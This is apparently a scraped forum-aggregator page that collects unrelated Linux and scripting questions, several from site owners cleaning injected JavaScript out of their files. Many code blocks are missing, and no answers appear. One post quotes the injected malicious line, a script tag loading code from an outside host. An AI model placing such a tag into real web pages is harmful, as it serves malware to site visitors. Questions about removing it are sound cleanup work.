Security :: Using Sed To Remove A Line From All Files In Directory
Jan 23, 2010
A Javascript has crept into all my hmtl, php files in my shared hosting account. I have SSH access.How can I use sed to remove that line from all files in a directory recursively ?sed doesnt change the original file.And I need to specify *.php and *.html
I have two questions:How do I remove files from Directory A if their name appears in Directory B?How do I move foo.jpg and bar.jpg from Directory C to Directory D if and only if foo.png and bar.png appear in Directory D?I suspect there's probably a bash one-liner for this, but...I can't come up with it.
My site was recently hacked and a line of <JAVASCRIPT> was inserted into all my php files. Is there a way to pull just that one line out of all the php files on the server? I was thinking of using a grep -iR <CODE> *.php then piping thru sed
I have a (hopefully) quick question which is regarding some scripting I used to do under a DOS/Windows env. I used to use the "for" command to iterate through a set of files in a directory using the line:
Code: for each %1 in ([dir]) do [command]
But that doesn't work under bash. I presume the syntax is slightly different but doing
Code: for --help or Code: man for
Doesn't give me much any information at to syntax or usage. I'm sure there is something in bash or the standard shell, I just can't seem to find it.
Where exactly are the temporary files stored, in /tmp or /var/tmp. How can i remove temporary files through command line? What is the difference between these two directories?
I am still a novice with Ubuntu and I am trying to write a shell script which will clean redundant files. I am stuck with one line where I would need a command which will remove all files from directory except some of them. Can anyone please advice how to add such an exception to the rm command? I have searched some bash shell tutorials, however, no joy. Guess I have overlooked something.
I was preparing a script which will remove all my files from directory which are 24 hour old.I tried some thing like thisfind . ( -name 'log.*' -mtime +1 ) -exec rm {}; but it is throughing error like : missing argument to exec.
I need a PHP script to delete a line with certain pattern from all filesin a directory. The Directory contain files with extensions .js,.html and.php. Do any body give a working code snippet to Read all files in a directory with above extension and delete that line from the files.
I would like to create a cronjob that will delete all files within a directory 1 hours after it is created to the folderI found this cron find /path/to/file/* -ctime +1 -exec rm {} ; but it's deleted all files.I want to make an exception, all file should be deleted except one file (letsay file a.zip)
I'm able to use the following to remove the target directory and recursively all of its subdirectories and contents. find '/target/directory/' -type d -name '*' -print0 | xargs -0 rm -rf
However, I do not want the target directory to be removed. How can I remove just the files in the target, the subdirectories, and their contents?
Our client-accounts were recently injected with the following script and since there are too many files that were injected (only index.php and index.html) how this script can be traced with a search command and removed in all files found.
I need to copy all subdirectories and files from one directory to another ever 5 minutes or so, with the old data automatically being overwritten with the new data. I'd also like this to run at startup. Is there any way this can be done? If so, what program would I need to schedule the automation and what is the command line I would need.
I just got an email from google saying my site contained malware. It has a line in it: "<script src='http://whitepix.info/3'></script>". I've noticed its recursively in all my .html and .txt files in my website. Can I make a linux script to run that will go through all my .html and txt files recursively and delete that line from them? I don't know how it got in all of them.
I am trying to write a program in C which compares two files and prints the line that is equal.
Here file1.txt has
and file2.txt has
Note: file2.txt consist of only a single string where as file2.txt has multiple lines. Actually im comparing two files with md5sum values.
Here is the code but it compares only first line of files..but it should compare the whole file1..and sorry iam a beginner in C can any1 sujest some modification to this code so that..it can compare file2 with entire file1
How would i go about copying files to a directory, yet skip the files that already exist in the directory, and also remove the files that are in the directory. For example:
Code:
$ls /dir1 img001.jpg img002.jpg
[code]....
Now i would like to copy from dir1 to dir2, but the contents of dir2 would be:
There are millions of files in many directories. Wherenver i try rm * or find or use xargs, they say 'argument list too long' and exit. How can i deleted files in a directory with so many files without deleting the directory itself.
I have two txt files containing x and y coordinates: xcoord.txt & ycoord.txt. I need to open them; read them line by line to get each coordinate; then each time I need to update Xs and Ys parameters inside another file called "dc.in" with the grabbed values.
Finally each time I need to run two exe files ( dc_2002 and st_vac) and produce corresponding output for each Xs and Ys ( dc.in is an input file for this exe files)
I have written the following code but it does not work:
I have a big csv-file wich is not formatted very well. I clean it up with removing a lot of html etc, but some of the lines breaks where they are not supposed to.What I want to do is to check next line, if it starts with 'PX' I don't want to do anything, but if it does not start with 'PX' I want to merge the two lines. That is removing the newline character on line one and replace it with a space.Can this be done with sed? (or maybe with perl or something, but I'm more familiar with sed)I've been looking und the net to find a solution, but to no result.
I'm extracting data from a xml file writing it to separate files then combining the results as a csv file.The problem is keeping the separate files in sync line by line.When a grep does not action I would like to put in a blank line or something to keep the lines in order.When the "<title>" is missing as in as in the first"<programme </programme>" that's where I need somethingto write to the file as dummy data to increment the line
I'm a bit new to Python programming and hoped that someone might be able to help with a problem I'm having. What I essentially want to do is to combine two text files line for line. I know how to do this in a bash script so to give you a better idea here's the code for that:
Code:
This is basically for adding on values to the end of a CSV file that uses ';' as the delimiter. So say file1 said:
And file2 said:
Then running this command would create merged_file1_and_file2 which would be:
The code I'm using at the moment is:
Code:
As I'm sure any experienced python programmer will see, this prints out the first line of the file "csvraw" and then all of the lines of "stamps" and then the remainder of "csvraw".
What I'd like to do is something like: (pseudo code, I know it's not python ;-))
Code:
Is this possible? I've tried googling and my Python Pocket Reference hasn't been much help. I've looked at pickling but that doesn't seem appropriate.
If I leave the computer running for a few minutes without doing anything on it, this screen appears demanding that I enter my password, otherwise I can't get back to Fedora. I understand the necessity for this security feature in a work environment, but I'm just a home user and this security screen is just a nagging problem I don't know how to get rid of.
I have two files (not sorted) and need to compare line by line (i.e. first line of file1 to be compared to all the lines of file2 and so as for the rest of file1). Output will be an array of length of file2. Any suggestion in BASH other than a grep inside two read line loops ( which is time consuming for files ~1000s of lines).